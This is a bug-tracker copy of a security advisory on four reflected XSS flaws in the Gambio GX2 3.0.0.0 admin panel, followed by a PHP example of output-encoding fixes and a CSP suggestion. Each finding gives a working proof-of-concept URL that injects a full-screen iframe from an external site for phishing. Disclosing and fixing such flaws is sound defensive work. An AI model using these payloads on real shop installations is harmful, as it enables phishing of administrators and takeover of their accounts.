GX-Bug #47148
Updated by Daniel Würdemann more than 8 years ago
Title: Multiple XSS (possible authenticated backend phishing attack)
Software: Gambio GX2
Version: 3.0.0.0
Vendor: Gambio GmbH (www.gambio.de)
Date: 23/06/2016
Credits / Author: Heiko Frenzel (www.heiko-frenzel.de)

Description: Gambio GX2 3.0.0.0 is vulnerable to XSS attacks, meaning that if an admin user can be tricked into visiting a crafted URL created by an attacker, the attacker is able to use phishing methods (fake login form via iframe / external content) or could compromise the admin computer by using exploits.

____________________________________________________________

#1 XSS

Exploit: HOST/admin/customers.php?xss=[XSS]

PoC: HOST/admin/customers.php?xss="></a></td></tr></table><iframe style="position:fixed;top:0;left:0;width:100%;min-height:700px;height:100%;" src="http://www.sicherheit-online.org/xternal/storm.html">

____________________________________________________________

#2 XSS

Exploit: HOST/admin/categories.php?xss=[XSS]

PoC: HOST/admin/categories.php?xss="></a></td></tr></table><iframe style="position:fixed;top:0;left:0;width:100%;min-height:700px;height:100%;" src="http://www.sicherheit-online.org/xternal/storm.html">

____________________________________________________________

#3 XSS

Exploit: HOST/admin/specials.php?xss=[XSS]

PoC: HOST/admin/specials.php?xss=xxx"></form><iframe style="position:fixed;top:0;left:0;width:100%;min-height:700px;height:100%;" src="http://www.sicherheit-online.org/xternal/storm.html">

____________________________________________________________

#4 XSS

Exploit: HOST/admin/orders.php?xss=[XSS]

PoC: HOST/admin/orders.php?xss=xxx"></form><iframe style="position:fixed;top:0;left:0;width:100%;min-height:700px;height:100%;" src="http://www.sicherheit-online.org/xternal/storm.html">
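All four findings above are the same defect class: a query parameter is written back into the admin page's HTML without encoding, so a value containing a quote and tag closers can break out of the attribute or form it was placed in. The following is an added illustration of the fix, not Gambio's code and not part of the advisory; the helper names `e()` and `urlParam()` and the echoed markup are hypothetical, and the sample value is constructed to have the same shape as the reported payloads (a closing quote followed by closing tags).

```php
<?php
// Added example, not Gambio's code: context-aware output encoding for a
// request parameter that is reflected into an admin page. Helper names are
// hypothetical; the sample value is constructed for demonstration.

declare(strict_types=1);

/**
 * Encode a string for insertion into HTML text or a double-quoted attribute.
 * ENT_QUOTES encodes both ' and ", so the value can never terminate the
 * attribute it is printed into; ENT_SUBSTITUTE replaces invalid UTF-8 instead
 * of returning an empty string, which would otherwise hide the problem.
 */
function e(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_HTML5 | ENT_SUBSTITUTE, 'UTF-8');
}

/**
 * Encode a value for use as a URL query component. When the resulting URL
 * is placed in href="...", attribute encoding with e() still applies on top:
 * each context gets its own encoder, and they are layered, not substituted.
 */
function urlParam(string $value): string
{
    return rawurlencode($value);
}

// Constructed sample value with the shape the advisory describes: a quote that
// would close an attribute, followed by tag closers and a new element.
$reflected = $_GET['xss'] ?? '"></a></td></tr></table><iframe src="https://example.invalid/">';

// Pattern the report describes (do not do this): raw interpolation lets the
// value rewrite the page structure.
// echo '<a href="customers.php?xss=' . $reflected . '">back</a>';

// Hardened form: every dynamic value is encoded for the exact context it lands in.
$href = 'customers.php?xss=' . urlParam($reflected);
echo '<a href="' . e($href) . '">back</a>' . PHP_EOL;
echo '<td>' . e($reflected) . '</td>' . PHP_EOL;
// Rendered output contains &quot; and &lt; in place of " and <, so the browser
// treats the value as text and no iframe element is created.
```

Encoding at the output sink is the fix the reported pages need; a Content-Security-Policy on the admin area that restricts `frame-src` (or `child-src`) to the shop's own origin is a reasonable defence-in-depth layer, since it would stop an injected frame from loading external content even if one reflection point were missed.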